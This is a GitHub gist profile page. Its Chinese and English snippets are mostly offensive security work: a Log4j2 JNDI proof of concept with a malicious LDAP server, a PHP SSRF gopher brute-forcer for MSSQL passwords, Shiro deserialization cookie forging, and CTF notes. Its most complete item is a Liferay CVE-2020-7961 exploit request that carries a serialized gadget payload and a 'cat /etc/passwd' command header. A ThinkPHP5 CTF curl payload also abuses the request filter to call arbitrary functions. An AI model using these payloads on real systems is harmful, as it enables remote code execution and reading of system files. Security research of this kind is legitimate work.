Skip to content

Instantly share code, notes, and snippets.

View kaiili's full-sized avatar

kaiili

33 followers · 10 following
View GitHub Profile
@kaiili
kaiili / check_local_listen_port.py
Created July 4, 2022 02:46
列出监听本地端口的进程
from psutil import Process, net_connections
from requests import get
from rich import print
def check_port_ishttp(port: int) -> bool:
"""通过输入的端口检查本地端口是否为 http协议
"""
url = f"http://127.0.0.1:{port}"
try:
@kaiili
kaiili / check.js
Last active March 22, 2022 23:40
a ql rule that math http requet url concat by var
var v = "/?"
const c = "/?"
const axios = require('axios').default;
var a = "http://q.co"
var a1 = "http://q.co" + "/?a"
var a2 = a + "/?a"
var a3 = a.concat("/?a")
var a4 = a + v
var a5 = a + c
@kaiili
kaiili / client.java
Created December 10, 2021 08:36
log4j2 高版本jdk的利用。ldapWithCB1.java 是恶意的 ldap服务。client.java 是 log4j2 的poc。tcp.go 是一个 tcp的logger,用于快速检测 log4j是否发起请求。
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
public class Main {
private static final Logger LOGGER = LogManager.getLogger();
public static void main(String[] args) {
// 打开 com.sun.jndi.ldap.object.trustURLCodebase 可以利用
System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase","true");
// rmi 加上路径后不会 lookup了
// ldap + 反序列化 ok
@kaiili
kaiili / mssql_boom.php
Created November 22, 2021 04:32
php ssrf 爆破 mssql 密码, 使用 gopahr协议 , 来自@stereotype32 。
<?php
// Ported from impacket's encryptPassword.
// As you see, encrypting password does not change the size, so it is much easier to craft the packet.
function encryptPassword($password){
$result = "";
for($i=0;$i<strlen($password);$i++){
$tmp = ord($password[$i]);
// echo $tmp;
$tmp = ((($tmp & 0x0f) << 4) + (($tmp & 0xf0) >> 4)) ^ 0xa5;
@kaiili
kaiili / ShiroWithTomcatehco.md
Created November 12, 2021 12:53
shiro 反序列化,springboot 回显。

1 从反序列化到代码执行

1.1 反序列化

shiro 使用 aes加密 序列化的object 作为 remoberMecookie,在获取加密密钥的情况下可以自己生成合理的cookie。

public static String AesCbcEncrypt(byte[] plainText,String key) throws Exception {
        byte[] k = Base64.getDecoder().decode(key);
 byte[] ivBytes = new byte[16];
@kaiili
kaiili / eth.md
Created September 25, 2021 15:03
区块链安全分享备存

1,区块链世界观 (30 min

1.1 分类 :

货币 (平台币,去中心化货币),NFT , DEFI,波卡,去中心化储存

社群 区块链社群和数字货币社群

1.2 toolchain:

@kaiili
kaiili / LiferayRCE(CVE-2020-7961).md
Created February 5, 2021 08:05 — forked from pikpikcu/LiferayRCE(CVE-2020-7961).md
POC Liferay RCE(CVE-2020-7961) 
POST /api/jsonws/invoke HTTP/1.1
Host: REDACTED
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
cmd2: cat /etc/passwd
Content-Type: application/x-www-form-urlencoded
Content-Length: 4956
Connection: close

cmd=%7B%22%2Fexpandocolumn%2Fupdate-column%22%3A%7B%7D%7D&p_auth=%3Cvalid+token%3E&formDate=%3Cdate%3E&columnId=123&name=asdasd&type=1&defaultData%3Acom.mchange.v2.c3p0.WrapperConnectionPoolDataSource=%7B%22userOverridesAsString%22%3A%22HexAsciiSerializedMap%3AACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F63
@kaiili
kaiili / main.go
Created December 26, 2020 09:53
huaweictf 2020
package main
import (
"bytes"
"crypto/aes"
"encoding/hex"
"fmt"
"math/rand"
"os"
"time"
@kaiili
kaiili / oldjs.md
Last active January 20, 2021 13:35
oldjs 的记录

[TOC]

oldjs

@kaiili
kaiili / Esay_tp5.md
Created October 22, 2020 05:05
kaii 的 nu1l ctf 2020 笔记

1,最初的想法 1,set_error_handler 干掉 tp的错误处理 (完成)

curl "http://127.0.0.1/?s=index/index" -d "a=var_dump&s=-1&_method=__construct&method=GET&filter[0]=var_dump&filter[1]=set_exception_handler&filter[2]=kaii" > .\Desktop\2.html

2,assert("phpinfo()") 然后传入参数变成了 null。